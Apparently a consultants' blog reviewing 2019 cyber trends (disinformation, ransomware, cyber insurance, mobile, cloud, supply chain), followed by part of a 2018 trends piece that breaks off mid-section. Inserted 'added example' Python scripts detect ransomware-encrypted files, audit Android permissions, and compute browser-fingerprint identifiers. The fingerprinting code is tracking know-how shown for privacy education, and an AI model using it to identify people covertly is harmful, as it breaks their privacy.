The Six Most Impactful Cyber and Business Tech Trends of 2019 and What They Mean for 2020.

By Mamady Konneh, MSST, and Jeremy Swenson, MBA, MSST.

Minneapolis, MN — Every year we review and comment on the most impactful security technology and business happenings of the prior year, focusing on those likely to shape the coming year in distinctive ways. Although the list is incomplete, these are six trends worth addressing, in order of importance.

Fig 1. (Cyber Trend Mashup Overlay, + Stock Image, 2019).

1) The Media Disinformation War Continues Embracing Artificial Intelligence:

With the advancement of communications technologies, the growth of large social media networks, and the “appification” of everything, users have morphed beyond merely consuming information to distributing and sometimes creating it. This makes disinformation easier to produce and far easier to spread.

Disinformation is false information deliberately created to mislead or disrupt, especially propaganda issued by a government to a rival power or to the media. Examples include governments creating digital hate mobs to smear key activists or journalists, suppress dissent, undermine political opponents, spread lies, and control public opinion (Shelly Banjo, Bloomberg, 05/23/2019). Today’s disinformation war is largely digital, waged via platforms like Facebook, Twitter, iTunes, WhatsApp, Yelp, and Instagram (Fig. 2). Yet state-sponsored and private news organizations are increasingly the weapon of choice, because they lend a false sense of validity. Undeniably, the battlefield is wherever a large number of followers are.

False news spreads faster than real news most of the time, largely because it is sensationalized. Since disinformation draws in viewers, which drives clicks and ad revenue, it is a money-making machine. Whoever controls what is trending in the news and on social media influences how many people believe it, which in turn determines how many people act on that belief, for good or bad. Human bias and irrational emotion amplify the effect.

Bots and botnets are often behind the spread of disinformation, complicating efforts to trace its source and to stop it. Further complicating matters is the volume of app (application) to app permissions. For example, the CNN and Twitter apps may have permission to post to Facebook, Facebook may have permission to post to WordPress, and WordPress may post to Reddit, or any combination of these. Not only does this make it hard to establish the chain of custody and the original source, it also weakens privacy and security: each cross-posting grant is a standing credential (typically an OAuth access token) that can be abused if any one account or app in the chain is compromised.

Fig 2. News, Social Media, and Puppet Master of Disinformation (Right, Chandrajit Banerjee, Left Marc Creighton, 2019).

Disinformation campaigns attempted to influence the 2016 U.S. presidential election and the 2018 congressional elections (Fig. 2). Their full effect is still not known, but some impact is undeniable, with debate on both sides. Taken together with outdated electoral policies and weak public-private partnerships, this supports the conclusion that disinformation capabilities will keep rising in the run-up to the 2020 U.S. presidential election. In fact, according to one report, the number of countries running organized social media manipulation campaigns grew from 48 in 2018 to 70 in 2019, a 150% increase over the 28 countries counted in 2017 (Samantha Bradshaw and Philip N. Howard, Oxford Internet Institute, 09/04/19). This is not about politics; it is about truth, appropriate technology, security improvements, and better public-private partnerships.

Fig. 3. Purported Russian Disinformation Flow (Samuel Morales, 11/08/19).


Large technology companies are under increasing scrutiny to secure their platforms from disinformation campaigns. One recent example: “Twitter announced that it had removed more than 88,000 accounts that it said were engaged in “platform manipulation” originating in Saudi Arabia” (Aaron Holmes, Business Insider, 12/20/19). Because platforms like this have so much activity to monitor, many similar campaigns go on unchecked. Yet let us not forget the free speech rights of users and the many claims that certain tech companies overreach in screening content to the point of undue bias. Reconciling these two extremes is very much a work in progress.

Another example, this one involving AI (Artificial Intelligence) enabled disinformation, is as follows: ‘“On December 20, 2019, Facebook took action against a network of over 900 pages, groups, and accounts on its own platform and on Instagram that were associated with “The Beauty of Life” (TheBL), reportedly an offshoot of the Epoch Media Group (EMG). These assets were removed for engaging in large-scale coordinated inauthentic behavior (CIB)”’ (Ben Nimmo, C. Shawn Eib, L. Tamora, et al; Graphika & the Atlantic Council’s Digital Forensics Research Lab, 12/2019). Many of these profiles used AI-generated fake profile photos. The network amassed about 55 million followers, so it plainly reached a very large audience.

Considering these disinformation events this past year, we think small and mid-size companies are likely the next target of disinformation campaigns. Such campaigns may aim to steal their customers, tarnish their reputation, or otherwise combine disinformation with advanced malware or other cyber fraud. They may be a direct target or a pass through medium. Small businesses are not immune from these risks even if never targeted before. While a large company could sustain several disinformation attacks, a small company could be easily run out of business by just one.

Imagine a dental competitor hiring a non-U.S. based hacking group whose bot army posts 1,000 fraudulent negative reviews of a dental office on Yelp. The victim now has a mess to clean up. Being a dental office and not tech experts, they have to hire a tech consultancy, and even then the full damage can never be undone. The stress and cost could drive them to shut down. Then there is the question of who pays for it, which raises the cyber insurance questions: do you have the correct coverage, and is there any way your claim can be denied?

Overall, disinformation is a double-edged sword: if one country uses disinformation against another, the target is very tempted to respond in kind. When the public sees this state-originated disinformation, they and NGO (non-governmental organization) groups respond whether they believe it or not, of course in different ways. The same dynamic applies in a company-to-company context.

Disinformation is indeed a vicious cycle that encourages lies, ignorance, all the while damaging the value of what journalism means. In 2020 we as journalists, thought leaders, consultants and citizens must not be afraid to confront these fallacies and hidden distortions for future generations — a quality based truthful pen is a powerful sword!

2) Ransomware Doubles Attacking More Government Entities:

Ransomware heavily hit hospitals, businesses, and universities in 2019, but local governments were the top target: at least 103 local U.S. government agencies, mostly at the city and county level, were attacked (Emsisoft Malware Lab, 12/12/19). Barracuda Networks reached a similar conclusion, finding more broadly that two-thirds of all known 2019 ransomware attacks in the U.S. targeted governments (Alfred Ng, CNET, 12/05/19). These attacks mostly begin with phishing emails. The attackers then gain a foothold on the targeted entity’s network, spread to as many systems as they can reach, and finally encrypt files so they are inaccessible until a ransom is paid. The victims are for the most part not federal offices like the FBI, NSA, DOD, or FAA, which have bigger budgets and better defenses.
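The last step of that chain, encrypting files in place, leaves a measurable trace: encrypted content has near-maximal byte entropy, and many families also append a telltale suffix to the file name. The script below is an added example written for this article, not code from Emsisoft, Barracuda or any of the cited sources. It scores files on both signals and shows the caveat a practitioner must handle: archives, images and PDFs are legitimately high-entropy, so entropy alone produces false positives. The sample files, suffix list and threshold are constructed for illustration.

```python
# Added example, not from the original article: a minimal ransomware indicator
# that flags files whose contents look encrypted (high Shannon entropy) or whose
# names carry an appended ransomware-style suffix. The sample files, suffix list
# and threshold below are constructed for illustration.
import hashlib
import math
from collections import Counter

# Formats whose legitimate contents are already compressed or encrypted and so
# look random even when untouched; without this guard every PDF or ZIP is a hit.
HIGH_ENTROPY_OK = {".zip", ".gz", ".7z", ".png", ".jpg", ".jpeg", ".mp4", ".pdf",
                   ".docx", ".xlsx"}
# Suffixes ransomware families commonly append (illustrative, not an IOC feed).
SUSPICIOUS_SUFFIXES = {".locked", ".encrypted", ".crypt", ".enc"}
ENTROPY_THRESHOLD = 7.5  # bits per byte; uniformly random data approaches 8.0


def shannon_entropy(data: bytes) -> float:
    """Entropy of the byte distribution in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def last_extension(name: str) -> str:
    """'budget.xlsx.locked' -> '.locked'; 'README' -> ''."""
    parts = name.lower().rsplit(".", 1)
    return "." + parts[1] if len(parts) == 2 else ""


def classify(name: str, data: bytes) -> dict:
    """Score one file; 'reasons' is empty when nothing looks wrong."""
    ext = last_extension(name)
    ent = shannon_entropy(data)
    reasons = []
    if ext in SUSPICIOUS_SUFFIXES:
        reasons.append(f"ransomware-style suffix {ext}")
    if ent >= ENTROPY_THRESHOLD and ext not in HIGH_ENTROPY_OK:
        reasons.append(f"entropy {ent:.2f} bits/byte is too high for a {ext or 'no-extension'} file")
    return {"name": name, "entropy": round(ent, 2), "suspicious": bool(reasons),
            "reasons": reasons}


def scan(files) -> list:
    """files: iterable of (name, content bytes). Returns one classification per file."""
    return [classify(name, data) for name, data in files]


def _pseudo_random(n_blocks: int) -> bytes:
    """Deterministic stand-in for ciphertext: chained SHA-256 digests."""
    return b"".join(hashlib.sha256(bytes([i])).digest() for i in range(n_blocks))


# Constructed sample set: a clean text file, a clean archive, a file encrypted
# in place (name unchanged), and a file encrypted with a suffix appended.
SAMPLE_FILES = [
    ("minutes.txt", b"Council meeting minutes, March 2019.\n" * 200),
    ("backup.zip", _pseudo_random(256)),
    ("notes.txt", _pseudo_random(256)),
    ("budget.xlsx.locked", _pseudo_random(256)),
]

if __name__ == "__main__":
    for result in scan(SAMPLE_FILES):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{result['name']:<22} {result['entropy']:>5} {flag} {'; '.join(result['reasons'])}")
```

Run stand-alone, the archive passes because its extension is on the allow list, while the text file encrypted in place and the renamed spreadsheet are both flagged. In production this logic belongs in a file-integrity or EDR sensor that compares the score before and after a write, since a single scan cannot tell new ciphertext from a file that was always an archive.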

In August 2019, twenty-three Texas cities were struck by a large coordinated ransomware attack. This overwhelmed them, so they were forced to seek state assistance (Kate Fazzini, CNBC, 08/20/19). Also in 2019, seven Florida cities were struck in similar attacks: River City, Riviera Beach, Lake City, Key Biscayne, Stuart, Naples, and, most recently, Pensacola (Rachael L. Thomas, Naples Daily News, 08/20/19 & CISOMAG, 12/27/19). Moreover, the city of Baltimore, Maryland sustained two ransomware attacks in 14 months (Kate Fazzini, CNBC, 08/20/19). Fig. 4 shows the City of New Orleans website taken offline after its attack, which left citizens without some services and information.

Fig. 4. City of New Orleans Website Down (NOLA.gov, City of New Orleans, 12/23/19).


Foolish as it may sound, local governments are increasingly opting to pay the ransom rather than rebuild their systems. After seeing Atlanta spend $2.6 million in 2018 to restore its systems rather than pay the roughly $52,000 ransom (Lily Hay Newman, Wired, 04/23/18), many officials have decided that it is cheaper to pay the hackers. One researcher put it this way: ‘“These government organizations are not always well-equipped on cybersecurity concerns, which makes them easy targets,” said Kevin Latimore, enterprise malware removal specialist for security software provider Malwarebytes. “Not only do they have the potential to pay, but they are a soft target”’ (Alfred Ng, CNET, 12/05/19). Further examples include Lake City, Florida, which paid hackers $426,000 in Bitcoin, and Riviera Beach, Florida, which paid $600,000 in Bitcoin in 2019. Much of this will be covered by their cyber insurance, but it complicates future payouts, making denials and premium increases more likely (Scottie Andrew and Saeed Ahmed, CNN, 06/27/19).

For the coming year, this means local governments need to harden their networks, train their staff better, and hire private-sector talent. If they have paid a ransom once, they should expect and prepare for another attack soon, but this should not rush the onboarding of new vendor tools, since vendors need to be risk assessed first. They should also outsource key IT tasks when they cannot meet the required service or security levels themselves. Lastly, paying the ransom is not a long-term solution: it increases the likelihood of another attack, and there is no guarantee the attackers have not already copied your data before encrypting it.

3) Insurance Companies Paying Ransoms Are Likely Encouraging More Attacks for Profits:

When organizations have cyber insurance, they are more likely to pay ransom demands. This makes ransomware more profitable than it would otherwise be and thus incentivizes more well-funded attacks (Emsisoft Malware Lab, 12/12/19). Yet if insurance companies did better due diligence reviewing prospective customers’ cyber risk processes, tools, SOC reports and the like, there would likely be fewer grounds for claim denials and fewer avoidable claims such as ransomware. In some cases, the customer is incented to prove its cyber due diligence to justify a favorable risk rating and lower premiums. However, the rigor of this due diligence is applied inconsistently, with the most scrutiny reserved for sizeable companies where more dollars and more complex risk exist. Can you imagine being a large insurance company asking a government entity for documentation like this? It might be difficult. Even small county governments often have unhelpful, overconfident bureaucrats who choke the needed risk management process. Private companies have the same issue, but with less bureaucratic insulation. Overall, better public-private partnerships are needed.

This year confirmed that cyber liability insurance risk assessment is still a contradictory mess. The carriers are profit-driven and often leave customers confused about what a policy means, especially small and medium-sized businesses that are not tech-focused. The risk assessment standards are immature, not organization specific, and outdated relative to current technology. If cyber insurance incentivizes ransomware, then consider the likely situation where an organization gets hit, the carrier pays the ransom less the deductible, and then the attackers demand a second payment. Carriers, adjusters, risk assessors, and even companies have not thought this through well enough. Most likely the carrier will deny the second payment, often with costly litigation in tandem.

Whatever the size of your organization, you should undergo strict security reviews in the insurance underwriting process. If the carrier does not ask much, or anything, about your technology or security, you might as well not pay for the coverage, because it is weak at best. Whatever risk diligence was completed in underwriting, you should not publicly disclose that you have such coverage, because cyber extortionists could then view you as a target. Cyber insurance should not be considered an alternative to an adequately funded and resourced security program; rather, it is a failsafe. Our related article from this summer clarifies some of these complexities: 10 Things IT Executives Must Know About Cyber Insurance!

Fig. 5. Cyber Security Spending Greatly Outpaces Cyber Insurance Spending, (Gartner, Munich Re, Microsoft, Marsh, 2019)


Lastly, we observed that cyber insurance spending is not growing as fast as cybersecurity spending from 2018 to 2019 (Fig. 5), and for 2019 to 2020 the estimated gap is $116 billion (Fig. 5). This trend is generally good, because you cannot insure away what you have not built securely in the first place. In physical security terms, it would be like a bank leaving its doors and windows wide open yet wanting robbery insurance: it is inviting robbery. Of course, this is far more complicated in cyberspace, and insurance companies and risk assessors are moderately speculative at best. We anticipate more partnerships with tech-savvy insurance brokers in 2020, more cyber insurance training, and perhaps new FinTech insurance startups that can reduce risk and drive efficiencies while legislators and large companies catch up.

4) Mobile Ecosystem Security Considerations Multiply:

Since the release of the first iPhone in 2007, the appification of everything has become the norm. As the transistor count of smartphone processors keeps roughly doubling every two years (Gordon Moore’s observation, 1965), and computing power and memory grow with it, the information security risk on these devices gets more complicated and multiplies with each new app installed.

Here are some recent top metrics from one independent blog study (Ian Blair, BuildFire, 2019):

  1. There are 2.8 million apps available for download on the Google Play Store. More apps equals more risk exposure.
  2. The Apple App Store has 2.2 million apps available for download.
  3. Mobile apps are expected to generate $189 billion in revenue by 2020.
  4. 49% of people open an app 11+ times each day.
  5. 21% of Millennials open an app 50+ times per day.
  6. 57% of all digital media usage comes from mobile apps.
  7. The average smartphone owner uses 30 apps each month, touching many or all of the mobile ecosystem components in Fig. 6 and thereby increasing complexity.

Fig 6. Mobile Ecosystem Components (Rohit Kumar, 2019).

The Apple App Store is a closed, curated distribution channel with a stricter review process and thus fewer apps, unlike the Google Play Store, which is more open and has more apps. Thus, in prior years Apple’s App Store was regularly perceived as more secure than Google’s Play Store. However, in the fall of 2019, a reported 18 malicious apps bypassed Apple’s vetting. Wired described it as follows: “it started small. Wandera’s security software flagged some unusual activity on a client’s iPhone. A lone speedometer app had made unexpected contact with a so-called command and control server, which had previously been identified as issuing orders to ad fraud malware in a separate Android campaign. In other words, the app had gone rogue” (Brian Barrett, Wired, 10/25/19).

Although the new iPhone 11’s A13 processor is only an incremental step up from the prior generation, the Qualcomm Snapdragon 865 announced for Samsung’s next Galaxy flagship (rumored at the time as the Galaxy S11 and released in 2020 as the Galaxy S20) raises the bar in some ways for both phones. This CPU is 5G enabled, while older chips are not. It also supports video capture at up to 8K, an ultra-high resolution that translates into very large files (Jessica Dolcourt, CNET, 12/19/19). This enables better video chat, HD gaming, and professional level photo capabilities.

Additionally, the 3D Sonic Max ultrasonic fingerprint reader that Qualcomm announced alongside the Snapdragon 865 is large enough to register two fingers at once, improving on the single-finger unlock of earlier Galaxy phones and challenging the new iPhone 11. As one commentator detailed: “This means it’s faster to unlock, and more secure when matching up more unique data points in the form of the ridges, valleys, and pores unique to your fingers. On phones, you might get the option to set up one or two-finger unlocking, or perhaps choose to use dual-finger authentication for mobile payments only, or select apps like your banking app” (Jessica Dolcourt, CNET, 12/19/19).

Faster CPUs, more storage and more apps in the mobile ecosystem mean more code and more data on each device, and therefore more places for malvertising, rootkits, viruses and other exploits to hide. Combine that with the increasing number of apps users download and the permissions they grant them, and the complexity increases both privacy and security risk. There is a very fine line between a hacked system and consented-to app permissions, yet most users have few details on what those permissions mean or even how many apps they have on their devices.

For 2020, we see education and awareness around the review and removal of non-essential mobile apps as a top priority, especially for devices used partly or wholly for work. This raises two questions: 1) what is the best BYOD (bring your own device) policy, and 2) how do you containerize company apps and data away from personal ones? Answering them requires a better understanding of geolocation, QR code scanning, in-text ads, micropayments, Bluetooth, geofencing, readers, and HTML5. It thus goes without saying that we expect more holes to be exposed in BYOD tools and policy as they gain adoption in 2020.
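Reviewing what an app actually asks for is the concrete version of the permission awareness argued for above. The script below is an added example written for this article, not code from Apple, Google or any vendor named here. It parses an Android manifest, lists the permissions Android classifies in its “dangerous” (runtime-granted) tier, and compares them against the set an app’s stated purpose justifies, using a hypothetical speedometer app that has no business reading contacts or the microphone. The manifest, package name, expected-permission set and the subset of dangerous permissions are constructed for illustration.

```python
# Added example, not from the original article or any vendor tool: audit an Android
# app manifest for permissions in Android's "dangerous" (runtime-granted) tier and
# compare them with what the app's stated purpose justifies. The manifest, package
# name and expected-permission set below are constructed for illustration.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"

# Subset of the permissions Android documents as "dangerous" (illustrative list).
DANGEROUS = {
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.ACCESS_COARSE_LOCATION",
    "android.permission.ACCESS_BACKGROUND_LOCATION", "android.permission.CAMERA",
    "android.permission.RECORD_AUDIO", "android.permission.READ_CONTACTS",
    "android.permission.WRITE_CONTACTS", "android.permission.READ_CALENDAR",
    "android.permission.READ_SMS", "android.permission.SEND_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.READ_CALL_LOG", "android.permission.READ_PHONE_STATE",
    "android.permission.READ_EXTERNAL_STORAGE", "android.permission.WRITE_EXTERNAL_STORAGE",
    "android.permission.BODY_SENSORS",
}

# Constructed manifest for a hypothetical speedometer app (package name invented).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.speedometer">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <application android:label="Speedo" android:debuggable="true" android:allowBackup="true"/>
</manifest>
"""

# What a speedometer legitimately needs from the dangerous tier: location only.
SPEEDOMETER_EXPECTED = {"android.permission.ACCESS_FINE_LOCATION"}


def requested_permissions(manifest_xml: str) -> list:
    """All <uses-permission android:name=...> values, in manifest order."""
    root = ET.fromstring(manifest_xml)
    return [el.get(NAME_ATTR) for el in root.iter("uses-permission")]


def audit(manifest_xml: str, expected: set) -> dict:
    """Dangerous permissions requested, those the app's purpose does not justify,
    and two <application> flags a reviewer should not see in a release build:
    debuggable (debugger can attach) and allowBackup (app data can be extracted
    through device backups)."""
    root = ET.fromstring(manifest_xml)
    perms = requested_permissions(manifest_xml)
    dangerous = sorted(p for p in perms if p in DANGEROUS)
    app = root.find("application")

    def app_flag(attr: str) -> bool:
        return app is not None and app.get(f"{{{ANDROID_NS}}}{attr}") == "true"

    return {
        "package": root.get("package"),
        "dangerous": dangerous,
        "unexpected": sorted(p for p in dangerous if p not in expected),
        "debuggable": app_flag("debuggable"),
        "allow_backup": app_flag("allowBackup"),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_MANIFEST, SPEEDOMETER_EXPECTED)
    print(f"{report['package']}: {len(report['dangerous'])} dangerous permission(s)")
    for p in report["unexpected"]:
        print(f"  not justified by app purpose: {p}")
    if report["debuggable"]:
        print("  android:debuggable=true should never ship in a release build")
```

On a real device the same manifest data can be pulled with Android's own tooling (for example by decoding the APK or dumping package info over adb) and fed into audit() unchanged; the expected-permission set is the part a BYOD policy owner has to decide per app category.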

5)  Cloud Adoption Raises Privacy and Compliance Concerns:

Cloud computing grew in 2019 and is expected to grow in the coming years. Many industries are opting for cloud computing because it is less costly than on-premises and the service quality is generally better. This especially applies to small and medium businesses that often don’t have the technology resources to build their own infrastructures. According to one study, “83% of enterprise workloads will be in the cloud by 2020” (LogicMonitor, 2019). As a result, many industries are increasing their investment in cloud computing and the costs are likely to go down as cloud providers improve — the services are being democratized via niche cloud service tool startups. At present, “50% of enterprises spend on average of $1.2 million dollars on cloud services annually” (LogicMonitor, 2019).

Although cloud computing might seem cheaper than on-premises solutions, it has downsides for security and privacy. Moving to the cloud means accepting the risk of having your data in someone else’s warehouse. The service level agreement and vendor risk assessment compliance documents will address most of this, but not comprehensively, because cloud vendors are selective about what they disclose to customers in their annual or quarterly vendor risk reviews. They are protecting their own confidentiality and that of their many other clients where shared infrastructure is involved. If you want complete privacy and control, build your own cloud, but accept the higher cost.

Fig. 7. Public Cloud Challenges Influencers Survey (LogicMonitor, 2019).

The above survey by the vendor LogicMonitor confirmed that security, governance and compliance, and privacy were the top challenges in 2019. We think these challenges will hold steady in 2020, while costs will likely decrease for basic use cases. If organizations continue to struggle to find cloud-trained employees, vendor lock-in will deepen, which is bad from a failover perspective. We think organizations should spend more on cloud-trained staff. They should also make sure they select at least two or three cloud providers, independent of one another. This helps staff get cross-trained on different cloud platforms and add-ons, mitigates risk, and makes vendors bid more competitively.

6) Supply Chain Cyber Security Threats Increase:

All organizations depend on other entities for goods and services: manufacturers, distributors, marketers, attorneys, drivers, resellers, software providers, accountants, and more. The flow of these from start to finish is the supply chain, and vendor management is the biggest part of it. As a result, it is challenging for organizations to identify and assess the security of every vendor they do business with. In fact, “at least 59% of organizations have suffered from cyberattacks through third-party companies” (Olivia Scott, Supply Chain Brain, 10/09/19). Depending on the vendor and the connection point there may be more or fewer steps. More steps increase complexity and often decrease transparency, which in turn often increases risk.

Every aspect of the supply chain has an internet-connected component, from UPS package scanners to invoice creation, inventory management, quality control, and more. Vendors who say or suggest they are not internet-connected are usually wrong, because they have forgotten something: utility applications, HVAC applications, coffee machine apps, navigation apps, payment processing apps, and their own 3rd parties that have access to customer data via the vendor, etc.

People often need clarification on what a 4th party vendor is: the vendors that your 3rd party vendor contracts with to meet your needs. With a 4th party vendor, you will have little insight into their infrastructure and processes, if any. Most likely any risk documentation you get from them will come via your 3rd party vendor. A lot of misinformation and hidden risk lives here. Vendor managers need good communication skills and business tact to deal with it.

In the context of cybersecurity, the supply chain poses a growing threat because most of the parts of our computers and smartphones, including the software that runs them, are made in other parts of the world. For example, the processors Apple designs for the iPhone are fabricated by Taiwan Semiconductor Manufacturing Company (TSMC), which in turn works with other vendors for even the smallest components in a highly complex supply chain, before separate contract manufacturers assemble the phones. If there is a security hole in one of the iPhone components, Apple, the customer, may not be the first to know, because TSMC or its 3rd and 4th party vendors may not know about it or may not disclose it. This negatively impacts Apple and iPhone users.

Observing this paradox, security pioneer Bruce Schneier stated, “the computers and smartphones you use are not built in the United States. Their chips aren’t made in the United States. The engineers who design and program them come from over a hundred countries. Thousands of people have the opportunity, acting alone, to slip a backdoor into the final product” (Bruce Schneier, New York Times, 09/25/19). Thus the supply chain path needs to be scrutinized for security compliance regularly, especially in the context of large-scale hardware manufacturing for data-centric products like smartphones, cars, computers, and medical devices — few devices are not data-centric these days.

In sum, the supply chain is here to stay because organizations will need to collaborate with one another in order to conduct their business efficiently. According to the Ponemon Institute, 3rd party misuse was the second-biggest security threat in 2019 (Olivia Scott, Supply Chain Brain, 10/09/19). Yet we need reminding that the supply chain is no longer merely transportation and inventory management, even for a goods and services company like a small construction firm with no website. We need to rethink the supply chain as more digital and more data-centric than we did in prior years. It is part of core business operations.

Thus, supply chain security should be a top priority for organizations in 2020, with a focus on 3rd party risk ranking and 4th party identification. Lastly, big entities like governments and corporate conglomerates, which have many different internal organizations interacting with one another, would be well advised to treat their own internal procurement process as an “external supply chain” in order to improve training and internal defenses; they are often their own worst enemy.

About the Authors:
Mamady Konneh (left) is a senior information security professional, speaker and mentor with 10+ years of relevant experience in security, risk management, and project management in the healthcare, finance, and retail industries. He is a dynamic team player who leads by taking initiatives in developing efficient risk mitigation and situational awareness tactics. He is proficient at assessing the needs of the business and providing the tools to resolve challenges by enhancing the business process. He holds an MSST (Master of Science in Security Technologies) degree from the U of MN where he researched global I.D. card best practices for the country of Guinea.

Jeremy Swenson (right) is a senior IT consultant, writer, and speaker in business analysis, project management, cyber-security, process improvement, leadership, music, and abstract thinking. He has been employed by or consulted at many banks, insurance companies, retailers, healthcare orgs, governments, and so on over 14 years. He has an MBA from St. Mary’s University of MN and an MSST (Master of Science in Security Technologies) degree from the U of MN.

Five Unique Tech Trends in 2018 and Implications For 2019

By Jeremy Swenson, MBA, MSST, and Angish Mebratu, MBA.

Every year we review and comment on the most impactful technology and business concepts from the prior year, those likely to significantly impact the coming year. Although incomplete, these are five areas worth addressing.

5. 5G Expansion Will Spur Business Innovation

Fig. 1. 1G to 5G Growth, Stock, 2018.

2018 was the year 5G moved from hype to reality, and it will become more widespread as the communications supply chain adopts it in 2019. 5G is the next iteration of mobile connectivity and aims to be much faster and more reliable than 4G and 3G. Impressively, 5G data speeds are projected to be 10 to 100 times faster than 4G. The benefits include enabling smart IoT-connected cities, seamless 8K video streaming, improved virtual reality gaming, self-driving cars that communicate with each other without disruption, thereby enhancing safety and reliability, and improved augmented reality glasses (HoloLens, Google Glass, etc.) providing a new way of looking at the world around us.

As emerging technologies such as artificial intelligence (AI), blockchain, the Internet of Things (IoT), and edge computing — the practice of processing data near the edge of the network where it is generated, rather than in a centralized data-processing repository — take hold everywhere, 5G can offer the advancements necessary to truly take advantage of them. These technologies require 5G’s higher data transfer speeds, interoperability, and improved reliability. Homes will get smarter, hospitals will be able to provide more intelligent care, the Internet of Things will go into hyperdrive; the implications of 5G are massive. Most importantly, 5G has much lower latency, enabling futuristic real-time application experimentation.

“There’s no doubt that much of the recent 5G activity has been focused on investments from service providers and equipment manufacturers,” said Nick Lippis, co-founder and co-chairman of the Open Networking User Group. “However, more IT leaders are starting to make plans for 5G, which includes determining its impact on their data center architecture, procurement strategies and the solutions they’ll roll out” (Kym Gilhooly, BizTech, 11/08/18).

AT&T is one of the leaders in 5G rollout, and as of 12/27/18 it had service up and running in these 12 cities: Atlanta, Charlotte, Dallas, Houston, Indianapolis, Jacksonville, Louisville, Oklahoma City, New Orleans, Raleigh, San Antonio and Waco (CNN Wire, 12/27/18). Verizon has a similar initiative at an earlier phase in some cities, while Google has Google Fiber in some cities, and there is much debate about whether it is better or worse than 5G; time will tell. More data and faster speeds drive more connected devices, which need security, data protection, and privacy; failure to protect them aggressively creates too much risk at high cost.

Fig. 2. Likely 5G Use Cases in 2020, Stock, 2018.

4. Browser/Device Fingerprinting Growth Will Spur Better PET (Privacy Enhancing Technologies)

Browser fingerprinting is a method in which websites gather bits of information about your visit, including your time zone, set of installed fonts, language preferences, some plug-in information, etc. (Bill Budington, Bennett Cyphers, Alan Toner, and Jeremy Gillula, Electronic Frontier Foundation, 12/22/18). These data elements are then combined to form a unique fingerprint that identifies your browser, or more. The next step is to identify your specific device, and then you individually.
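The “combined to form a unique fingerprint” step is worth seeing in code, because individually harmless attributes become identifying only in combination. The block below is an added example written for this article, not code from the EFF or the original post. It hashes a visitor’s attributes into a fingerprint and, more usefully, measures how many bits of identifying information each attribute contributes within a population, the metric the EFF’s Panopticlick project made familiar. The eight-visitor population, the attribute set and the hash choice are constructed for illustration.

```python
# Added example, not from the EFF article or the original post: how a few ordinary
# browser attributes combine into a near-unique identifier, and how to measure the
# identifying power of each attribute in bits. The visitor population below is
# constructed; the hash and separator are arbitrary implementation choices.
import hashlib
import math
from collections import Counter

ATTRIBUTES = ("timezone", "fonts", "language", "plugins")

# Constructed population of eight visitors, one tuple per visitor.
VISITORS = [
    ("America/Chicago", "Arial;Verdana", "en-US", "pdf"),
    ("America/Chicago", "Arial;Verdana", "en-US", "pdf"),   # identical to the first
    ("America/Chicago", "Arial;Verdana;Wingdings", "en-US", "pdf"),
    ("America/New_York", "Arial;Verdana", "en-US", "pdf;flash"),
    ("Europe/Berlin", "Arial;DejaVu Sans", "de-DE", "pdf"),
    ("Europe/Berlin", "Arial;DejaVu Sans", "de-DE", ""),
    ("Asia/Tokyo", "MS Gothic;Arial", "ja-JP", "pdf"),
    ("America/Chicago", "Arial;Verdana;Comic Sans MS", "en-US", "pdf"),
]


def fingerprint(visitor) -> str:
    """Hash the concatenated attributes; changing any one of them yields a new ID."""
    canonical = "\x1f".join(visitor)  # ASCII unit separator: no ambiguous joins
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()[:16]


def column_entropy(values) -> float:
    """Average surprisal, -log2(p), of the values in one attribute column: how many
    bits of identifying information the attribute carries within this population."""
    counts = Counter(values)
    n = len(values)
    return sum(-math.log2(counts[v] / n) for v in values) / n


def attribute_report(visitors) -> dict:
    """Bits of identifying information per attribute, rounded; higher is worse for privacy."""
    return {
        name: round(column_entropy([v[i] for v in visitors]), 2)
        for i, name in enumerate(ATTRIBUTES)
    }


def fingerprint_bits(visitors) -> float:
    """Bits carried by the combined fingerprint; the ceiling is log2(len(visitors))."""
    return round(column_entropy([fingerprint(v) for v in visitors]), 2)


def unique_visitors(visitors) -> int:
    """Count visitors whose fingerprint nobody else in the population shares."""
    counts = Counter(fingerprint(v) for v in visitors)
    return sum(1 for v in visitors if counts[fingerprint(v)] == 1)


if __name__ == "__main__":
    for name, bits in attribute_report(VISITORS).items():
        print(f"{name:<9} {bits:.2f} bits")
    print(f"combined  {fingerprint_bits(VISITORS):.2f} bits "
          f"(max {math.log2(len(VISITORS)):.2f}); "
          f"{unique_visitors(VISITORS)}/{len(VISITORS)} visitors uniquely identified")
```

In this toy population the font list is the most identifying single attribute and the plug-in list the least, yet combining all four singles out six of the eight visitors; only the two identical configurations stay anonymous. That is also why the most effective PETs either make many users look alike (the Tor Browser approach) or return slightly different values on each visit so the hash no longer stays stable.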

Fig. 3. Browser Finger Printing Data, Stock, 2018.

Device fingerprinting overcomes some of the inefficiencies of other means of customer tracking, most notably cookies installed in web browsers, which businesses have long used to monitor our behavior when we visit their websites (Bernard Marr, Forbes, 06/23/17). Employers do this at a much more invasive level, but the pay is the tradeoff. When employees use their own mobile device for work-related things, protection of their personal data is best achieved via data containerization tools like AirWatch and Centrify. Even on these devices, the problem for trackers is that cookies can be deleted whenever we want; it is relatively easy for us to stop specific sites, services or companies from using them to track us, depending on how technical we are. “Device fingerprinting doesn’t have this limitation as it doesn’t rely on storing data locally on our machines, instead, it simply monitors data transmitted and received as devices connect with each other” (Bernard Marr, Forbes, 06/23/17).

